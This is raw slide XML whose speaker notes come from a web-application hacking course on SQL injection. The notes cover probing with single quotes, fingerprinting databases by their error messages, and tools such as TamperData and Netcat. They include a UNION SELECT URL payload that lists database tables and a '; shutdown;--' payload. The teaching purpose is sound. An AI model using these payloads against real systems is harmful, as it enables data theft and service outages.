                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D0D68C"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1300">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291844" name="Text Box 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974725" y="4648200"/>
            <a:ext cx="5364163" cy="4319588"/>
          </a:xfr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lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL injection is when an attacker includes bits of database commands (primarily Structured Query Language, or SQL) in web forms or parameters which will end up being input into the database.  The power of SQL injection is limited solely by the attacker's understanding of the SQL Language and creativity.  Sometimes restrictions are placed on the web form input, so finesse may be necessary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291845" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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2866" name="Text Box 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974725" y="4648200"/>
            <a:ext cx="5364163" cy="4319588"/>
          </a:xfr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lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some developers rely on the fact that a web form field should only accept X characters (where X is a small number, too small for much valid SQL).  If this restriction is enforced in the client HTML form, and not even on the server side, then bypassing this length restriction is trivial. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292867" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293891"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Input into a web application can be done through the URL (links, forms, and XMLHttpRequests), through form fields (visible and hidden), and through cookies.  This is your attack surface.  You will want to test each field and variable to see if it breaks in interesting ways when you introduce common SQL delimiters, such as the single quote "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'".  Does the application break in a different way than if you just input invalid letters?  Do you see SQL Errors?  Do you see a blank page?  Or a generic error page?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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89</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python is a simple language to understand and learn.  It includes the libraries needed to handle HTTP as part of its core libraries, which means for most scripts we do not need to install anything beyond Python itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRP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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294915"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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As consistent as SQL strives to be, each DBMS has taken certain liberties with the command-space.  Once we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'ve identified what database is in use, we can craft our attacks to that server.  Some DBMSs provide very handy attack tools.  For instance, MSSQL Server includes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, which is functionally equivalent to system() in Perl.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each DBMS also maintains their own tables about the databases and tables setup on the system.  We can make better sense of our database (or others we  may have access to) by consulting this information.  For example, MySQL stores very interesting information in "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>information_schema.TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is the database and TABLES is the table of interest).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example query used on a web app using MySQL Server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>https://victim/?name=Kevin%20Johnson'%20union%20select%201,TABLE_SCHEMA,TABLE_NAME%20from%20information_schema.TABLES%20where%20'a'='a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The HTTP GET "name" field was vulnerable to SQL Injection, and "Kevin Johnson" was a valid name (important for this application).  Using a UNION SELECT we are able to return interesting information about the tables in the MySQL server using the existing application.  This query expected three fields back (number, string, string), so we provide a number (1) and then have the database return two string fields of our choosing.</a:t>
            </a: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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Error messages provide two different pieces of information.  First it may reveal what the back end database is, and second, we have a potential SQL injection flaw.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some examples of helpful identifiers are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>"ORA" - part of Oracle error messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>"Incorrect Syntax" - often in MSSQL error messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>"Error in your SQL" - indicates MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>5-digit hex number error code - most likely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296963"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Here are some important SQL commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SELECT - Query the data and return the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>CREATE - Create some database object like a record, tables, stored-procedure, etc…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>UPDATE - Update an existing database object (such as a record)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>DROP - Delete data (drop user_table;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SHUTDOWN - stop the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>AND - logical joining of two parts of a query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>OR - logical joining of two parts of a query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>UNION - join the results of two queries (number of fields must equal)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>; - finish the sql statement - and possibly start another one.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>     ; shutdown;-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>--  - comment delimiter for some database (not all)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>     often used to "get rid of the rest of a canned SQL query…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IF - conditional statement  - helpful in Blind SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SUBSTRING - Select a part of the string - helpful in Blind SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>WAITFOR - Cause a time delay - helpful for Blind SQL injection</a:t>
            </a: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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297987"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovering SQL injection flaws is similar to discovering most other vulnerabilities.  You can manually visit pages, submit bad data, and target the application with a good deal of context, which is the best way to uncover non-trivial vulnerabilities.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Alternatively, you can leverage a fuzzer of some sort. A fuzzer is a tool which automates the process of finding potential vulnerabilities quickly. Fuzzers are useful, but they often miss complex vulnerabilities.</a:t>
            </a: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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manual discovery can be slow and tedious, but it is not difficult.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are quite a few tools available to assist in this process.  The first one is your favorite web browser. Firefox in particular has many plug-ins which can help such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TamperData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>LiveHTTPHeaders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>.  You may also find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> to be an invaluable tool throughout most stages of hacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In many cases, attacks can be launched directly from the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Plugins, such as "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TamperData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>" for Firefox, provide handy capabilities, such as identifying and allowing the manipulation of hidden fields, cookies, and header information.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A web-hacking proxy such as Paros or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>WebScarab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> will allow for the viewing, tracking, and modifying of data as it is transmitted over the network.  This removes much of the complexity of deciding what information should be included in an attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sniffers, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, can assist with understanding what each request/response looks like on the network.  Sniffers and proxies can assist with targeted attacks using raw tools such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>OpenSSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>. As we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'ve mentioned, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>OpenSSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>s_client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) allows us to hack directly over HTTPS or any SSL-wrapped connection. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is a great tool for interacting with the web-server directly, giving complete control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300035"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TamperData is a Firefox extension that allows the user to edit the HTTP headers as they interact with the application.  It allows us to mangle each request to test for SQL injection (or XSS as we will see later.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Here is the pop up that asks if the attacker would like to edit this transaction, submit it as is, or abort the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301059"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If on the previous screen the attacker had chosen "Tamper", this screen appears. It breaks apart the various parts of the request into easy to understand pieces.  The attacker is able to edit which ever pieces they would like and select ok.  They are then prompted with the previous screen again, where they can select submit to send in their changes.</a:t>
            </a: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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
